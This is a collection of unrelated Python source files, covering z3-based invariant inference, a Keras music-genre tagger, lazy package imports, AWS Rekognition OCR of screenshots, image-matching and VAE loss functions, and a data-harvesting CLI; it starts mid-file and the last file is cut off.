operator.eq for p in postconds), postconds # assert isinstance(traces, Traces), traces # preconds = [pc for pc in self.preconds] # # preconds = [pc for pc in self.preconds # # if self._check(pc.expr(self.use_reals), loc, check_consistency=True)] # #print("preconds", preconds) # postconds = sorted(postconds, key=lambda d: len(str(d))) # postconds = [Eqt(p) for p in postconds] # # find traces satifies each postcond # ptraces = {p: Traces([t for t in traces if p.test_single_trace(t)]) # for p in postconds} # preposts = [] # results # def myappend(mypreconds, is_conj): # # TODO: check, stat=Inv.PROVED ? 
# prepost = PrePost(Invs(mypreconds), postcond, stat=Inv.PROVED) # prepost.is_conj = is_conj # preposts.append(prepost) # postconds = sorted( # postconds, key=lambda d: len(ptraces[d]), reverse=True) # idxs = list(range(len(postconds))) # for idx in idxs: # print('gh1') # postcond = postconds[idx] # try: # postcond_expr = postcond.expr(self.use_reals) # except NotImplementedError as ex: # # cannot parse something like sqrt(x) # continue # #print("postcond", postcond) # print('gh1a') # others = [postconds[i] for i in idxs[:idx] + idxs[idx+1:]] # traces_ = [t for t in ptraces[postcond] # if all(t not in ptraces[other] for other in others)] # traces_ = Traces(traces_) # conj_preconds = [pc for pc in preconds if pc.test(traces_)] # #print(conj_preconds, conj_preconds) # conj_preconds = self.get_conj_preconds( # loc, conj_preconds, postcond_expr) # #print('cpreconds', conj_preconds) # if conj_preconds: # myappend(conj_preconds, is_conj=True) # print('gh1b') # disj_preconds = self.get_disj_preconds( # loc, preconds, postcond_expr, traces) # print('gh1b@@@') # #print('dpreconds', disj_preconds) # if disj_preconds: # myappend(disj_preconds, is_conj=False) # print('gh1c') # print('gh2') # preposts = Invs(preposts) # print('gh3') # print(preposts) # #preposts = preposts.simplify(self.use_reals) # return preposts def check(self, pcs, postcond_expr, loc): precond_expr = z3.And(pcs) if isinstance(pcs, list) else pcs inv = z3.Implies(precond_expr, postcond_expr) return self._check(inv, loc, check_consistency=False) def _check(self, inv, loc, check_consistency): cexs, isSucc = self.symstates.mcheck_d(loc, inv, None, 1) if check_consistency: if cexs: # satisfies return True return False else: if cexs or not isSucc: # mlog.debug("{}: discard {}".format(loc, inv)) return False return True def get_disj_preconds(self, loc, preconds, postcond_expr, traces): assert all(isinstance(p, Inv) for p in preconds), preconds assert z3.is_expr(postcond_expr), postcond_expr preconds_ = [] for pc in preconds: if self.check(pc.expr(self.use_reals), postcond_expr, loc): #print("hello: {} => {}".format(pc, postcond_expr)) preconds_.append(pc) if len(preconds_) >= 2: is_conj = False preconds_ = Invs._simplify(preconds_, is_conj, self.use_reals) return preconds_ def get_conj_preconds(self, loc, preconds, postcond_expr): """ preconds => post can be strengthened by removing some preconds e.g., a&b => post is stronger than a&b&c => post """ assert all(isinstance(p, Inv) for p in preconds), preconds assert z3.is_expr(postcond_expr), postcond_expr if not preconds: return [] preconds = sorted(preconds, key=lambda p: len(Miscs.get_vars(p.inv))) preconds_exprs = [pc.expr(self.use_reals) for pc in preconds] if not self.check(preconds_exprs, postcond_expr, loc): return [] def _imply(js, _): jexprs = [preconds_exprs[j] for j in js] return self.check(jexprs, postcond_expr, loc) results = Miscs.simplify_idxs(list(range(len(preconds))), _imply) results = [preconds[i] for i in results] return results @classmethod def get_postconds(cls, eqt): assert Miscs.is_expr(eqt), eqt assert eqt.operator() == operator.eq, eqt # tCtr symbols = [s for s in Miscs.get_vars(eqt) if settings.CTR_VAR in str(s)] if not symbols: return assert len(symbols) == 1, \ "should only have 1 tCtr symbol: {}, {}".format( symbols, settings.CTR_VAR) postconds = sage.all.solve(eqt, symbols[0]) return postconds if len(postconds) >= 1 else None # PRIVATE METHODS @classmethod def get_preconds(cls, symbols, term_siz): """ sage: x,y,z = sage.all.var('x y z') #doctest: 
+NORMALIZE_WHITESPACE
        sage: sorted(Infer.get_preconds([x, y], 2), key=str)
        [-x + y < 0, -x + y <= 0, -x - y < 0, -x - y <= 0, -x < 0, -x <= 0,
         -y < 0, -y <= 0, x + y < 0, x + y <= 0, x - y < 0, x - y <= 0,
         x < 0, x <= 0, x == 0, y < 0, y <= 0, y == 0]
        """
        t1 = [Eqt(t == 0) for t in symbols]  # M == 0, N == 0
        ts = Miscs.get_terms_fixed_coefs(symbols, term_siz, settings.ICOEFS)
        t2 = [Oct(t < 0) for t in ts]    # +/-M +/-N > 0
        t3 = [Oct(t <= 0) for t in ts]   # +/-M +/-N >= 0
        return t1 + t2 + t3
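
# A hedged doctest-style sketch of get_postconds (it assumes settings.CTR_VAR
# is the substring 'tCtr' that marks the loop-counter symbol):
#
#   sage: x, tCtr = sage.all.var('x tCtr')
#   sage: Infer.get_postconds(2*tCtr == x*(x + 1))
#   [tCtr == 1/2*x^2 + 1/2*x]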
11590195
from keras import backend as K import os import time import h5py import sys from tagger_net import MusicTaggerCRNN from keras.optimizers import SGD import numpy as np from keras.utils import np_utils from math import floor from music_tagger_cnn import MusicTaggerCNN from sklearn.metrics import confusion_matrix import matplotlib.pyplot as plt from utils import save_data, load_dataset, save_dataset, sort_result, predict_label, load_gt, plot_confusion_matrix, extract_melgrams # Parameters to set TRAIN = 0 TEST = 1 SAVE_MODEL = 0 SAVE_WEIGHTS = 0 LOAD_MODEL = 0 LOAD_WEIGHTS = 1 # Dataset MULTIFRAMES = 1 SAVE_DB = 0 LOAD_DB = 0 # Model parameters nb_classes = 10 nb_epoch = 40 batch_size = 100 time_elapsed = 0 # GTZAN Dataset Tags tags = ['blues', 'classical', 'country', 'disco', 'hiphop', 'jazz', 'metal', 'pop', 'reggae', 'rock'] tags = np.array(tags) # Paths to set model_name = "crnn_net_adam_ours" model_path = "models_trained/" + model_name + "/" weights_path = "models_trained/" + model_name + "/weights/" train_songs_list = 'lists/train_songs_list_ours.txt' test_songs_list = 'lists/test_songs_list_ours.txt' #test_songs_list = 'lists/test_songs_gtzan_list.txt' # Create directories for the models & weights if not os.path.exists(model_path): os.makedirs(model_path) print 'Path created: ', model_path if not os.path.exists(weights_path): os.makedirs(weights_path) print 'Path created: ', weights_path # Divide the song into multiple frames of 29.1s or take the center crop. if MULTIFRAMES: train_gt_list = 'lists/train_gt_list_multiframes.txt' test_gt_list = 'lists/test_gt_ours.txt' else: train_gt_list = 'lists/train_gt_list.txt' test_gt_list = 'lists/test_gt_list.txt' # Data Loading if LOAD_DB: if MULTIFRAMES: print 'Loading dataset multiframe...' X_train, y_train, num_frames_train = load_dataset('') X_test, y_test, num_frames_test = load_dataset('') else: X_train, X_test, y_train, y_test = load_dataset('') # Compute mel-spectogram for all the frames else: X_train, y_train, num_frames_train = extract_melgrams(train_songs_list, MULTIFRAMES, process_all_song=False, num_songs_genre=20) print('X_train shape:', X_train.shape) X_test, y_test, num_frames_test = extract_melgrams(test_songs_list, MULTIFRAMES, process_all_song=False, num_songs_genre=10) print(X_train.shape, 'train samples') print(X_test.shape, 'test samples') y_train = np.array(y_train) y_test = np.array(y_test) if SAVE_DB: if MULTIFRAMES: save_dataset('music_dataset/music_dataset_multiframe_train.h5', X_train, y_train,num_frames_train) save_dataset('music_dataset/music_dataset_multiframe_test.h5', X_test,y_test,num_frames_test) else: save_dataset('music_dataset/music_dataset.h5', X_train, X_test, y_train, y_test) Y_train = np_utils.to_categorical(y_train, nb_classes) Y_test = np_utils.to_categorical(y_test, nb_classes) print 'Shape labels y_train: ', Y_train.shape print 'Shape labels y_test: ', Y_test.shape # Initialize model model = MusicTaggerCRNN(weights='msd', input_tensor=(1, 96, 1366)) #model = MusicTaggerCNN(weights='msd', input_tensor=(1, 96, 1366)) #sgd = SGD(lr=0.01, decay=1e-6, momentum=0.9, nesterov=True) model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy']) if LOAD_WEIGHTS: model.load_weights(weights_path+model_name+'_epoch_40.h5') model.summary() # Save model architecture if SAVE_MODEL: json_string = model.to_json() f = open(model_path+model_name+".json", 'w') f.write(json_string) f.close() # Train model if TRAIN: try: print ("Training the model") f_train = 
open(model_path+model_name+"_scores_training.txt", 'w') f_test = open(model_path+model_name+"_scores_test.txt", 'w') f_scores = open(model_path+model_name+"_scores.txt", 'w') for epoch in range(1,nb_epoch+1): t0 = time.time() print ("Number of epoch: " +str(epoch)+"/"+str(nb_epoch)) sys.stdout.flush() scores = model.fit(X_train, Y_train, batch_size=batch_size, nb_epoch=1, verbose=1, validation_data=(X_test, Y_test)) time_elapsed = time_elapsed + time.time() - t0 print ("Time Elapsed: " +str(time_elapsed)) sys.stdout.flush() score_train = model.evaluate(X_train, Y_train, verbose=0) print('Train Loss:', score_train[0]) print('Train Accuracy:', score_train[1]) f_train.write(str(score_train)+"\n") score_test = model.evaluate(X_test, Y_test, verbose=0) print('Test Loss:', score_test[0]) print('Test Accuracy:', score_test[1]) f_test.write(str(score_test)+"\n") f_scores.write(str(score_train[0])+","+str(score_train[1])+","+str(score_test[0])+","+str(score_test[1]) + "\n") if SAVE_WEIGHTS and epoch % 5 == 0: model.save_weights(weights_path + model_name + "_epoch_" + str(epoch) + ".h5") print("Saved model to disk in: " + weights_path + model_name + "_epoch" + str(epoch) + ".h5") f_train.close() f_test.close() f_scores.close() # Save time elapsed f = open(model_path+model_name+"_time_elapsed.txt", 'w') f.write(str(time_elapsed)) f.close() # Save files when an sudden close happens / ctrl C except: f_train.close() f_test.close() f_scores.close() # Save time elapsed f = open(model_path + model_name + "_time_elapsed.txt", 'w') f.write(str(time_elapsed)) f.close() finally: f_train.close() f_test.close() f_scores.close() # Save time elapsed f = open(model_path + model_name + "_time_elapsed.txt", 'w') f.write(str(time_elapsed)) f.close() if TEST: t0 = time.time() print 'Predicting...','\n' real_labels_mean = load_gt(test_gt_list) real_labels_frames = y_test results = np.zeros((X_test.shape[0], tags.shape[0])) predicted_labels_mean = np.zeros((num_frames_test.shape[0], 1)) predicted_labels_frames = np.zeros((y_test.shape[0], 1)) song_paths = open(test_songs_list, 'r').read().splitlines() previous_numFrames = 0 n=0 for i in range(0, num_frames_test.shape[0]): print song_paths[i] num_frames=num_frames_test[i] print 'Num_frames: ', str(num_frames),'\n' results[previous_numFrames:previous_numFrames+num_frames] = model.predict( X_test[previous_numFrames:previous_numFrames+num_frames, :, :, :]) for j in range(previous_numFrames,previous_numFrames+num_frames): #normalize the results total = results[j,:].sum() results[j,:]=results[j,:]/total sort_result(tags, results[j,:].tolist()) predicted_label_frames=predict_label(results[j,:]) predicted_labels_frames[n]=predicted_label_frames n+=1 print '\n',"Mean of the song: " results_song = results[previous_numFrames:previous_numFrames+num_frames] mean=results_song.mean(0) sort_result(tags, mean.tolist()) predicted_label_mean=predict_label(mean) predicted_labels_mean[i]=predicted_label_mean print '\n','Predicted label: ', str(tags[predicted_label_mean]),'\n' if predicted_label_mean != real_labels_mean[i]: print 'WRONG!!' previous_numFrames = previous_numFrames+num_frames #break print '\n\n\n' cnf_matrix_frames = confusion_matrix(real_labels_frames, predicted_labels_frames) plot_confusion_matrix(cnf_matrix_frames, classes=tags, title='Confusion matrix (frames)') cnf_matrix_mean = confusion_matrix(real_labels_mean, predicted_labels_mean) plot_confusion_matrix(cnf_matrix_mean, classes=tags, title='Confusion matrix (using mean)')
11590234
from numpy.fft import __file__ as FFT_FILE

# https://github.com/numpy/numpy/issues/11456
# https://github.com/ContinuumIO/anaconda-issues/issues/9697
# https://github.com/IntelPython/mkl_fft/issues/11
# Still there (22.2.19) https://github.com/IntelPython/mkl_fft/issues/24
# Estimated that mkl=2019.3 is required (at the moment 2019.1)
# $ conda env export --name=base | grep mkl
#     mkl=2019.1=144

with open(FFT_FILE) as f:
    if 'patch_fft = True' in f.read():
        raise Exception(
            'Your Numpy version uses MKL-FFT. That version causes '
            f'segmentation faults. To fix it, open {FFT_FILE} and edit '
            'it such that `patch_fft = True` becomes `patch_fft = False`.'
        )

__all__ = [
    'array',
    'io',
    'math',
    'notebook',
    'testing',
    'transform',
    'utils',
    'visualization',
]


def _lazy_import_submodules(__path__, __name__, __package__):
    # Lazily import all subpackages.
    # Note: define all subpackages in __all__.
    import sys
    import pkgutil
    import operator
    import importlib

    _available_submodules = list(map(
        operator.itemgetter(1),
        pkgutil.iter_modules(__path__)
    ))

    class _LazySubModule(sys.modules[__name__].__class__):
        # In Python 3.7+ the class is not necessary: module-level __dir__ and
        # __getattr__ are enough.
        # See: https://snarky.ca/lazy-importing-in-python-3-7
        def __dir__(self):
            ret = super().__dir__()
            return [*ret, *_available_submodules]

        def __getattr__(self, item):
            if item in _available_submodules:
                return importlib.import_module(f'{__package__}.{item}')
            else:
                attrs = dir(self) + list(_available_submodules)
                attrs = list(dict.fromkeys(attrs))  # drop duplicates
                import difflib
                # Suggestions are sorted by their similarity.
                suggestions = difflib.get_close_matches(
                    item, attrs, cutoff=0, n=100
                )
                raise AttributeError(f'module {__package__} has no attribute'
                                     f' {item!r}.\n'
                                     f'Close matches: {suggestions!r}.')

    sys.modules[__name__].__class__ = _LazySubModule


_lazy_import_submodules(
    __name__=__name__,
    __path__=__path__,
    __package__=__package__
)
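
# A hedged illustration of the effect (the package name is whatever package
# this __init__.py belongs to; `mypkg` is purely a placeholder):
#
#   import mypkg          # fast: no submodules imported yet
#   mypkg.transform       # first access triggers importlib.import_module('mypkg.transform')
#   mypkg.transfrom       # AttributeError listing 'transform' among the close matches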
11590250
import io import json import boto3 import numpy as np import os import pandas as pd import requests from PIL import Image, ImageFilter from lib import mwo_image_slicer client = boto3.client('rekognition') #instantiate AWS client test_imgs_path = "E:/MWO/mwo_data/data/test_data/" #test images folder if not os.path.exists("../output/blog_files/dataframes"): os.makedirs("../output/blog_files/dataframes") def convert_to_byte_array(img): """ Converts an image file to a byte array for use with the Rekognition API """ img_byte_arr = io.BytesIO() img.save(img_byte_arr, format='PNG') img_byte_arr = img_byte_arr.getvalue() return img_byte_arr def grey_min_max(img, min_grey=185): """ """ img = img.convert("L") img_px = img.load() for i in range(img.size[1]): for j in range(img.size[0]): if img_px[j,i] < min_grey: img_px[j,i] = 0 else: img_px[j,i] = 255 img.save("../data/test_data/testpx.jpg") return img #instantiate image tools for project print("loading image to slicer") mwo_slicer = mwo_image_slicer.mwoImageSlicer(client) #handles image slicing and OCR requests mwo_slicer.load_image(image="20171118200711_1.jpg") #set current image for handling #cut and save horizontal image slices to ../data/test_data/ print("slicing image horizontally and saving slices to ../data/test_data/") h_slices = mwo_slicer.slice_image_horizontal(mwo_slicer.current_img, save_img=True) #pass single horizontal slice of the screenshot to AWS and get result #the example blog uses row 1 horizontal_slice = Image.open("../data/test_data/horizontal_slice_1.jpg") horizontal_slice_arr = convert_to_byte_array(horizontal_slice) horizontal_slice_ocr_resp = client.detect_text(Image={"Bytes":horizontal_slice_arr}) print("writing JSON response to file") with open("../output/blog_files/ocr_responses/single_line_ocr_resp.json", "w") as outfile: json.dump(horizontal_slice_ocr_resp, outfile) #get detected words from OCR response text_line = [] text_words = [] for text_detected in horizontal_slice_ocr_resp["TextDetections"]: #print(text_detected["DetectedText"]) if text_detected["Type"] == "LINE": text_line.append(text_detected["DetectedText"]) elif text_detected["Type"] == "WORD": text_words.append(text_detected["DetectedText"]) print() print("line text \n", text_line) print("words text \n", text_words) #add line spacing for terminal output print() print() #greyscale and threshold horizontal image print("converting image to greyscale and threshing") horizontal_slice_grey = grey_min_max(horizontal_slice) horizontal_slice_grey_arr = convert_to_byte_array(horizontal_slice_grey) horizontal_slice_grey_ocr_resp = client.detect_text(Image={"Bytes":horizontal_slice_grey_arr}) print("writing JSON response to file") with open("../output/blog_files/ocr_responses/single_line_grey_ocr_resp.json", "w") as outfile: json.dump(horizontal_slice_grey_ocr_resp, outfile) #get detected words from OCR response text_line_grey = [] text_words_grey = [] for text_detected in horizontal_slice_grey_ocr_resp["TextDetections"]: #print(text_detected["DetectedText"]) if text_detected["Type"] == "LINE": text_line_grey.append(text_detected["DetectedText"]) elif text_detected["Type"] == "WORD": text_words_grey.append(text_detected["DetectedText"]) print() print("line text after greyscale and threshold \n", text_line_grey) print("words text after greyscale and threshold \n", text_words_grey) print("showing image before and after grey scale and threshold modifications") horizontal_slice.show() horizontal_slice_grey.show() #add line spacing for terminal output print() print() 
print("*"*50) #show delineation of single line vs full dataframe results print("Creating full dataframe from horizontal screenshot slices") #create entire dataframe using horizontal slices #no greyscale or threshing horizontal_slice_df = mwo_slicer.img_to_dataframe_h(mwo_slicer.current_img, save_img=True, thresh=False, save_df=True, save_name="h_method_df.txt", filepath="../output/blog_files/dataframes/") print(horizontal_slice_df) print() print("*"*50) print("Creating full dataframe from horizontal screenshot slices using threshing method") #create entire dataframe using horizontal slices #with greyscale and threshing horizontal_slice_thresh_df = mwo_slicer.img_to_dataframe_h(mwo_slicer.current_img, save_img=True, thresh=True, save_df=True, save_name="h_method_threshed_df.txt", filepath="../output/blog_files/dataframes/") print(horizontal_slice_thresh_df) ## Construct entire dataframe: first without resize and thresholding, second with resize and thresholding
11590274
import torch from thirdparty.implementation.oanet.core.utils import torch_skew_symmetric import numpy as np def batch_episym(x1, x2, F): batch_size, num_pts = x1.shape[0], x1.shape[1] x1 = torch.cat([x1, x1.new_ones(batch_size, num_pts, 1)], dim=-1).reshape(batch_size, num_pts, 3, 1) x2 = torch.cat([x2, x2.new_ones(batch_size, num_pts, 1)], dim=-1).reshape(batch_size, num_pts, 3, 1) F = F.reshape(-1, 1, 3, 3).repeat(1, num_pts, 1, 1) x2Fx1 = torch.matmul(x2.transpose(2, 3), torch.matmul( F, x1)).reshape(batch_size, num_pts) Fx1 = torch.matmul(F, x1).reshape(batch_size, num_pts, 3) Ftx2 = torch.matmul(F.transpose(2, 3), x2).reshape(batch_size, num_pts, 3) ys = x2Fx1**2 * ( 1.0 / (Fx1[:, :, 0]**2 + Fx1[:, :, 1]**2 + 1e-15) + 1.0 / (Ftx2[:, :, 0]**2 + Ftx2[:, :, 1]**2 + 1e-15)) return ys class MatchLoss(object): def __init__(self, config): self.loss_essential = config.loss_essential self.loss_classif = config.loss_classif self.use_fundamental = config.use_fundamental self.obj_geod_th = config.obj_geod_th self.geo_loss_margin = config.geo_loss_margin self.loss_essential_init_iter = config.loss_essential_init_iter def run(self, global_step, data, logits, e_hat): R_in, t_in, y_in, pts_virt = data['Rs'], data['ts'], data['ys'], data['virtPts'] # Get groundtruth Essential matrix e_gt_unnorm = torch.reshape(torch.matmul( torch.reshape(torch_skew_symmetric(t_in), (-1, 3, 3)), torch.reshape(R_in, (-1, 3, 3)) ), (-1, 9)) e_gt = e_gt_unnorm / torch.norm(e_gt_unnorm, dim=1, keepdim=True) ess_hat = e_hat if self.use_fundamental: ess_hat = torch.matmul(torch.matmul(data['T2s'].transpose( 1, 2), ess_hat.reshape(-1, 3, 3)), data['T1s']) # get essential matrix from fundamental matrix ess_hat = torch.matmul(torch.matmul(data['K2s'].transpose( 1, 2), ess_hat.reshape(-1, 3, 3)), data['K1s']).reshape(-1, 9) ess_hat = ess_hat / torch.norm(ess_hat, dim=1, keepdim=True) # Essential/Fundamental matrix loss pts1_virts, pts2_virts = pts_virt[:, :, :2], pts_virt[:, :, 2:] geod = batch_episym(pts1_virts, pts2_virts, e_hat) essential_loss = torch.min( geod, self.geo_loss_margin*geod.new_ones(geod.shape)) essential_loss = essential_loss.mean() # we do not use the l2 loss, just save the value for convenience L2_loss = torch.mean(torch.min( torch.sum(torch.pow(ess_hat - e_gt, 2), dim=1), torch.sum(torch.pow(ess_hat + e_gt, 2), dim=1) )) # Classification loss # The groundtruth epi sqr gt_geod_d = y_in[:, :, 0] is_pos = (gt_geod_d < self.obj_geod_th).type(logits.type()) is_neg = (gt_geod_d >= self.obj_geod_th).type(logits.type()) c = is_pos - is_neg classif_losses = - \ torch.log(torch.sigmoid(c * logits) + np.finfo(float).eps.item()) # balance num_pos = torch.relu(torch.sum(is_pos, dim=1) - 1.0) + 1.0 num_neg = torch.relu(torch.sum(is_neg, dim=1) - 1.0) + 1.0 classif_loss_p = torch.sum(classif_losses * is_pos, dim=1) classif_loss_n = torch.sum(classif_losses * is_neg, dim=1) classif_loss = torch.mean( classif_loss_p * 0.5 / num_pos + classif_loss_n * 0.5 / num_neg) precision = torch.mean( torch.sum((logits > 0).type(is_pos.type()) * is_pos, dim=1) / torch.sum((logits > 0).type(is_pos.type()) * (is_pos + is_neg), dim=1) ) recall = torch.mean( torch.sum((logits > 0).type(is_pos.type()) * is_pos, dim=1) / torch.sum(is_pos, dim=1) ) loss = 0 # Check global_step and add essential loss if self.loss_essential > 0 and global_step >= self.loss_essential_init_iter: loss += self.loss_essential * essential_loss if self.loss_classif > 0: loss += self.loss_classif * classif_loss return [loss, (self.loss_essential * essential_loss).item(), 
(self.loss_classif * classif_loss).item(), L2_loss.item(), precision.item(), recall.item()]
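# A minimal, self-contained sketch (not part of the original file) of what
# batch_episym computes: one symmetric epipolar residual per putative
# correspondence. Shapes are assumptions: B image pairs, N matches each, and
# one flattened 3x3 essential/fundamental matrix per pair. Assumes the
# thirdparty import at the top of this module resolves.
if __name__ == "__main__":
    B, N = 2, 8
    x1 = torch.rand(B, N, 2)   # normalized coordinates in image 1
    x2 = torch.rand(B, N, 2)   # normalized coordinates in image 2
    E = torch.rand(B, 9)       # flattened 3x3 matrices, as MatchLoss passes them
    residuals = batch_episym(x1, x2, E)
    print(residuals.shape)     # torch.Size([2, 8]) -- one residual per match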
11590288
import re
import os

import pendulum

from share import tasks
from share.bin.util import command
from share.harvest.scheduler import HarvestScheduler
from share.models import SourceConfig


def get_sourceconfig(name):
    try:
        return SourceConfig.objects.get(label=name)
    except SourceConfig.DoesNotExist:
        print('SourceConfig "{}" not found.'.format(name))
        fuzzy = list(SourceConfig.objects.filter(label__icontains=name).values_list('label', flat=True))
        if fuzzy:
            print('Did you mean?\n\t{}'.format('\n\t'.join(fuzzy)))
    return None


@command('Fetch data to disk or stdout, using the specified SourceConfig')
def fetch(args, argv):
    """
    Usage: {0} fetch <sourceconfig> [<date> | --start=YYYY-MM-DD --end=YYYY-MM-DD] [--limit=LIMIT] [--print | --out=DIR] [--set-spec=SET]
           {0} fetch <sourceconfig> --ids <ids>... [--print | --out=DIR]

    Options:
        -l, --limit=NUMBER      Limit the harvester to NUMBER of documents
        -p, --print             Print results to stdout rather than to a file
        -o, --out=DIR           The directory to store the fetched data in. Defaults to ./fetched/<sourceconfig>
        -s, --start=YYYY-MM-DD  The date at which to start fetching data.
        -e, --end=YYYY-MM-DD    The date at which to stop fetching data.
        --set-spec=SET          The OAI setSpec to limit harvesting to.
        --ids                   IDs of specific records to fetch.
    """
    config = get_sourceconfig(args['<sourceconfig>'])
    if not config:
        return -1

    harvester = config.get_harvester(pretty=True)

    ids = args['<ids>']
    if ids:
        gen = (harvester.fetch_by_id(id) for id in ids)
    else:
        kwargs = {k: v for k, v in {
            'limit': int(args['--limit']) if args.get('--limit') else None,
            'set_spec': args.get('--set-spec'),
        }.items() if v is not None}

        if not args['<date>'] and not (args['--start'] and args['--end']):
            gen = harvester.fetch(**kwargs)
        elif args['<date>']:
            gen = harvester.fetch_date(pendulum.parse(args['<date>']), **kwargs)
        else:
            gen = harvester.fetch_date_range(pendulum.parse(args['--start']), pendulum.parse(args['--end']), **kwargs)

    if not args['--print']:
        args['--out'] = args['--out'] or os.path.join(os.curdir, 'fetched', config.label)
        os.makedirs(args['--out'], exist_ok=True)

    for result in gen:
        if args['--print']:
            print('Harvested data with identifier "{}"'.format(result.identifier))
            print(result.datum)
            print('\n')
        else:
            suffix = '.xml' if result.datum.startswith('<') else '.json'
            with open(os.path.join(args['--out'], re.sub(r'[:\\\/\?\*]', '', str(result.identifier))) + suffix, 'w') as fobj:
                fobj.write(result.datum)


@command('Harvest data using the specified SourceConfig')
def harvest(args, argv):
    """
    Usage: {0} harvest <sourceconfig> [<date>] [options]
           {0} harvest <sourceconfig> --all [<date>] [options]
           {0} harvest <sourceconfig> (--start=YYYY-MM-DD --end=YYYY-MM-DD) [options]

    Options:
        -l, --limit=NUMBER      Limit the harvester to NUMBER of documents
        -s, --start=YYYY-MM-DD  The date at which to start fetching data.
        -e, --end=YYYY-MM-DD    The date at which to stop fetching data.
        -q, --quiet             Do not print out the harvested records
        --set-spec=SET          The OAI setSpec to limit harvesting to.
""" config = get_sourceconfig(args['<sourceconfig>']) if not config: return -1 kwargs = {k: v for k, v in { 'limit': int(args['--limit']) if args.get('--limit') else None, 'set_spec': args.get('--set-spec'), }.items() if v is not None} if not args['<date>'] and not (args['--start'] and args['--end']): gen = config.get_harvester().harvest(**kwargs) elif args['<date>']: gen = config.get_harvester().harvest_date(pendulum.parse(args['<date>']), **kwargs) else: gen = config.get_harvester().harvest_date_range(pendulum.parse(args['--start']), pendulum.parse(args['--end']), **kwargs) # "Spin" the generator but don't keep the documents in memory for datum in gen: if args['--quiet']: continue print(datum) @command('Create HarvestJobs for the specified SourceConfig') def schedule(args, argv): """ Usage: {0} schedule <sourceconfig> [<date> | (--start=YYYY-MM-DD --end=YYYY-MM-DD) | --complete] [--tasks | --run] {0} schedule [<date> | (--start=YYYY-MM-DD --end=YYYY-MM-DD) | --complete] [--tasks | --run] --all Options: -t, --tasks Spawn harvest tasks for each created job. -r, --run Run the harvest task for each created job. -a, --all Schedule jobs for all enabled SourceConfigs. -c, --complete Schedule all jobs between today and the SourceConfig's earliest date. -s, --start=YYYY-MM-DD The date at which to start fetching data. -e, --end=YYYY-MM-DD The date at which to stop fetching data. -j, --no-ingest Do not process harvested data. """ if not args['--all']: configs = [get_sourceconfig(args['<sourceconfig>'])] if not configs[0]: return -1 else: configs = SourceConfig.objects.exclude(disabled=True).exclude(source__is_deleted=True) kwargs = {k: v for k, v in { 'ingest': not args.get('--no-ingest'), }.items() if v is not None} claim_jobs = args['--run'] or args['--tasks'] jobs = [] for config in configs: scheduler = HarvestScheduler(config, claim_jobs=claim_jobs) if not (args['<date>'] or args['--start'] or args['--end']): jobs.append(scheduler.today()) elif args['<date>']: jobs.append(scheduler.date(pendulum.parse(args['<date>']))) else: jobs.extend(scheduler.range(pendulum.parse(args['--start']), pendulum.parse(args['--end']))) if not claim_jobs: return for job in jobs: if args['--run']: tasks.harvest.apply((), {'job_id': job.id, **kwargs}, retry=False, throw=True) elif args['--tasks']: tasks.harvest.apply_async((), {'job_id': job.id, **kwargs})
11590318
import torch
from torch import nn
import torch.nn.functional as F

eps = 1e-7


class VAECriterion(nn.Module):
    """
    Here we calculate the VAE loss.

    The VAE objective (to be minimized) is:

        -E_{z~Q}[log P(X|z)] + KL[Q(z|X) || P(z)]

    For a Gaussian decoder with fixed std x_sigma and a diagonal Gaussian
    posterior N(mu, diag(sigma^2)), this becomes:

        ||X - X_reconstructed||^2 / (2 * x_sigma^2)
        + 0.5 * sum(mu^2 + sigma^2 - ln(sigma^2) - 1)

    Our inputs are: x, x_reconstructed, z_mean, z_log_sigma, disc_log_alpha
    """

    def __init__(self, discrete_dim=10, x_sigma=1, bce_reconstruction=True):
        """
        :param discrete_dim: the dim for discrete latent variables
        :param x_sigma: std of the Gaussian decoder p(x|z); scales the MSE reconstruction term
        :param bce_reconstruction: if True, use binary cross entropy for reconstruction instead of MSE
        """
        super(VAECriterion, self).__init__()
        self.x_sigma = x_sigma
        self.bce_reconstruction = bce_reconstruction
        self.disc_log_prior_param = torch.log(
            torch.tensor([1 / discrete_dim for i in range(discrete_dim)]).view(1, -1).float().cuda())

    def forward(self, x, x_reconstructed, z_mean, z_log_sigma, disc_log_alpha):
        """
        :param x: input & ground truth
        :param x_reconstructed: the reconstructed output by VAE
        :param z_mean: the mean of the continuous latent variable
        :param z_log_sigma: the log std of the continuous latent variable
        :param disc_log_alpha: the param list for the disc param
        :return: reconstruct_loss, continuous_kl_loss, disc_kl_loss
        """
        batch_size = x.size(0)
        # calculate reconstruct loss, sum in instance, mean in batch
        # we use the Binary Cross Entropy loss to do calculation
        if self.bce_reconstruction:
            reconstruct_loss = F.binary_cross_entropy_with_logits(x_reconstructed, x, reduction="sum") / (batch_size)
        else:
            reconstruct_loss = F.mse_loss(torch.sigmoid(x_reconstructed), x, reduction="sum") / (
                    2 * batch_size * (self.x_sigma ** 2))

        # calculate latent space KL divergence
        z_mean_sq = z_mean * z_mean
        z_log_sigma_sq = 2 * z_log_sigma
        z_sigma_sq = torch.exp(z_log_sigma_sq)
        continuous_kl_loss = 0.5 * torch.sum(z_mean_sq + z_sigma_sq - z_log_sigma_sq - 1) / batch_size
        # notice here we duplicate the 0.5 by each part

        # disc param : log(a1),...,log(an) type
        disc_kl_loss = torch.sum(
            torch.exp(disc_log_alpha) * (disc_log_alpha - self.disc_log_prior_param)) / batch_size
        return reconstruct_loss, continuous_kl_loss, disc_kl_loss


class M1Criterion(nn.Module):
    def __init__(self, x_sigma=1, bce_reconstruction=True):
        super(M1Criterion, self).__init__()
        self.x_sigma = x_sigma
        self.bce_reconstruction = bce_reconstruction

    def forward(self, x, x_reconstructed, M1_mean, M1_log_sigma):
        batch_size = x.size(0)
        if self.bce_reconstruction:
            reconstruct_loss = F.binary_cross_entropy_with_logits(x_reconstructed, x, reduction="sum") / (batch_size)
        else:
            reconstruct_loss = F.mse_loss(torch.sigmoid(x_reconstructed), x, reduction="sum") / (
                    2 * batch_size * (self.x_sigma ** 2))

        # calculate latent space KL divergence
        M1_mean_sq = M1_mean * M1_mean
        M1_log_sigma_sq = 2 * M1_log_sigma
        M1_sigma_sq = torch.exp(M1_log_sigma_sq)
        M1_continuous_kl_loss = 0.5 * torch.sum(M1_mean_sq + M1_sigma_sq - M1_log_sigma_sq - 1) / batch_size
        return reconstruct_loss, M1_continuous_kl_loss


class M2Criterion(nn.Module):
    def __init__(self, discrete_dim=10):
        super(M2Criterion, self).__init__()
        self.disc_log_prior_param = torch.log(
            torch.tensor([1 / discrete_dim for i in range(discrete_dim)]).view(1, -1).float().cuda())

